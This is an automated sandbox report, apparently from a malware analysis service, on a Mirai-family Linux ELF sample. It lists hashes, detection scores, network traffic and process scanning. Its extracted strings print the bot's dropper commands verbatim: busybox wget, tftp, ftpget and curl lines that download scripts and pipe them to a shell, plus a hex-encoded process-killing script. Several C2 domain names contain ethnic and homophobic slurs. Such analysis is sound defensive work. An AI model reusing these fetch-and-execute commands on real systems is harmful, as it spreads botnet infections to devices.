Linux Analysis Report
GcOeQTPzrh.elf

Overview

General Information

Sample name: GcOeQTPzrh.elf
renamed because original name is a hash value
Original sample name: 553097f42a705959d8ac6fa18ef66402.elf
Analysis ID: 1432450
MD5: 553097f42a705959d8ac6fa18ef66402
SHA1: 5b080cba5797148f29a2db09ee3c6966fe295c5f
SHA256: 853b73f9ecd2f7e8a75e9a45292ad6978b420e9bb5ee9b09010bfe88c514115e
Tags: 32elfmiraisparc
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: GcOeQTPzrh.elf ReversingLabs: Detection: 55%
Source: GcOeQTPzrh.elf Virustotal: Detection: 33% Perma Link
Source: GcOeQTPzrh.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking

barindex
Source: global traffic DNS traffic detected: malformed DNS query: infectedslurs.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: yellowchink.pirate. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: w3d0ntlikebot5.parody. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: hiakamai.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: freethewind.parody. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: netfags.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: dogeatingchink.parody. [malformed]
Source: global traffic TCP traffic: 192.168.2.23:37208 -> 204.76.203.223:38241
Source: /tmp/GcOeQTPzrh.elf (PID: 6238) Socket: 127.0.0.1::39148 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 168.195.22.93
Source: unknown TCP traffic detected without corresponding DNS query: 3.79.81.223
Source: unknown TCP traffic detected without corresponding DNS query: 174.200.151.232
Source: unknown TCP traffic detected without corresponding DNS query: 156.53.26.87
Source: unknown TCP traffic detected without corresponding DNS query: 109.240.159.92
Source: unknown TCP traffic detected without corresponding DNS query: 52.215.196.204
Source: unknown TCP traffic detected without corresponding DNS query: 198.40.19.67
Source: unknown TCP traffic detected without corresponding DNS query: 131.178.208.104
Source: unknown TCP traffic detected without corresponding DNS query: 221.118.126.217
Source: unknown TCP traffic detected without corresponding DNS query: 119.149.120.184
Source: unknown TCP traffic detected without corresponding DNS query: 194.208.202.50
Source: unknown TCP traffic detected without corresponding DNS query: 32.103.19.249
Source: unknown TCP traffic detected without corresponding DNS query: 220.21.19.159
Source: unknown TCP traffic detected without corresponding DNS query: 175.30.186.233
Source: unknown TCP traffic detected without corresponding DNS query: 157.87.225.124
Source: unknown TCP traffic detected without corresponding DNS query: 206.158.222.25
Source: unknown TCP traffic detected without corresponding DNS query: 99.218.254.201
Source: unknown TCP traffic detected without corresponding DNS query: 80.203.77.13
Source: unknown TCP traffic detected without corresponding DNS query: 130.246.82.156
Source: unknown TCP traffic detected without corresponding DNS query: 133.52.80.254
Source: unknown TCP traffic detected without corresponding DNS query: 113.60.230.122
Source: unknown TCP traffic detected without corresponding DNS query: 102.155.192.243
Source: unknown TCP traffic detected without corresponding DNS query: 115.103.192.161
Source: unknown TCP traffic detected without corresponding DNS query: 221.17.36.168
Source: unknown TCP traffic detected without corresponding DNS query: 93.54.154.195
Source: unknown TCP traffic detected without corresponding DNS query: 120.73.74.199
Source: unknown TCP traffic detected without corresponding DNS query: 155.87.158.100
Source: unknown TCP traffic detected without corresponding DNS query: 50.115.30.183
Source: unknown TCP traffic detected without corresponding DNS query: 220.135.143.225
Source: unknown TCP traffic detected without corresponding DNS query: 7.138.249.127
Source: unknown TCP traffic detected without corresponding DNS query: 180.166.251.117
Source: unknown TCP traffic detected without corresponding DNS query: 7.121.78.50
Source: unknown TCP traffic detected without corresponding DNS query: 76.51.24.100
Source: unknown TCP traffic detected without corresponding DNS query: 219.50.49.67
Source: unknown TCP traffic detected without corresponding DNS query: 188.213.49.29
Source: unknown TCP traffic detected without corresponding DNS query: 180.195.87.183
Source: unknown TCP traffic detected without corresponding DNS query: 172.93.49.115
Source: unknown TCP traffic detected without corresponding DNS query: 180.194.157.155
Source: unknown TCP traffic detected without corresponding DNS query: 9.119.194.53
Source: unknown TCP traffic detected without corresponding DNS query: 216.49.184.61
Source: unknown TCP traffic detected without corresponding DNS query: 58.52.66.110
Source: unknown TCP traffic detected without corresponding DNS query: 201.58.201.203
Source: unknown TCP traffic detected without corresponding DNS query: 92.239.230.204
Source: unknown TCP traffic detected without corresponding DNS query: 24.83.131.107
Source: unknown TCP traffic detected without corresponding DNS query: 165.36.26.54
Source: unknown TCP traffic detected without corresponding DNS query: 7.60.11.172
Source: unknown TCP traffic detected without corresponding DNS query: 9.231.105.235
Source: unknown TCP traffic detected without corresponding DNS query: 147.47.34.119
Source: unknown TCP traffic detected without corresponding DNS query: 211.9.187.93
Source: unknown TCP traffic detected without corresponding DNS query: 46.158.247.72
Source: global traffic DNS traffic detected: DNS query: dogeatingchink.parody
Source: global traffic DNS traffic detected: DNS query: infectedslurs.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: yellowchink.pirate. [malformed]
Source: global traffic DNS traffic detected: DNS query: w3d0ntlikebot5.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: hiakamai.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: freethewind.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: netfags.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: dogeatingchink.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: infectedchink.pirate
Source: GcOeQTPzrh.elf String found in binary or memory: http:///curl.sh
Source: GcOeQTPzrh.elf String found in binary or memory: http:///wget.sh
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57484
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57484 -> 443
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/tmp//var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal52.troj.linELF@0/334@12/0
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6304/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6304/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6303/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6303/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6306/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6306/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6305/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6305/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6307/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6307/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6263/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6263/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6262/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6262/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6265/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6265/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6264/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6264/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6302/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6302/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6301/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6301/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6261/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6261/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6260/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6260/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/cmdline Jump to behavior
Source: /usr/bin/dash (PID: 6299) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.UQEbML9pKR /tmp/tmp.MxD8c0WHrz /tmp/tmp.gi5gwjlr7Q Jump to behavior
Source: /usr/bin/dash (PID: 6300) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.UQEbML9pKR /tmp/tmp.MxD8c0WHrz /tmp/tmp.gi5gwjlr7Q Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6238) Queries kernel information via 'uname': Jump to behavior
Source: GcOeQTPzrh.elf, 6238.1.0000556eea687000.0000556eea70c000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.0000556eea687000.0000556eea70c000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sparc
Source: GcOeQTPzrh.elf, 6238.1.0000556eea687000.0000556eea70c000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.0000556eea687000.0000556eea70c000.rw-.sdmp Binary or memory string: nU!/etc/qemu-binfmt/sparc
Source: GcOeQTPzrh.elf, 6238.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sparc
Source: GcOeQTPzrh.elf, 6238.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/GcOeQTPzrh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/GcOeQTPzrh.elf
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs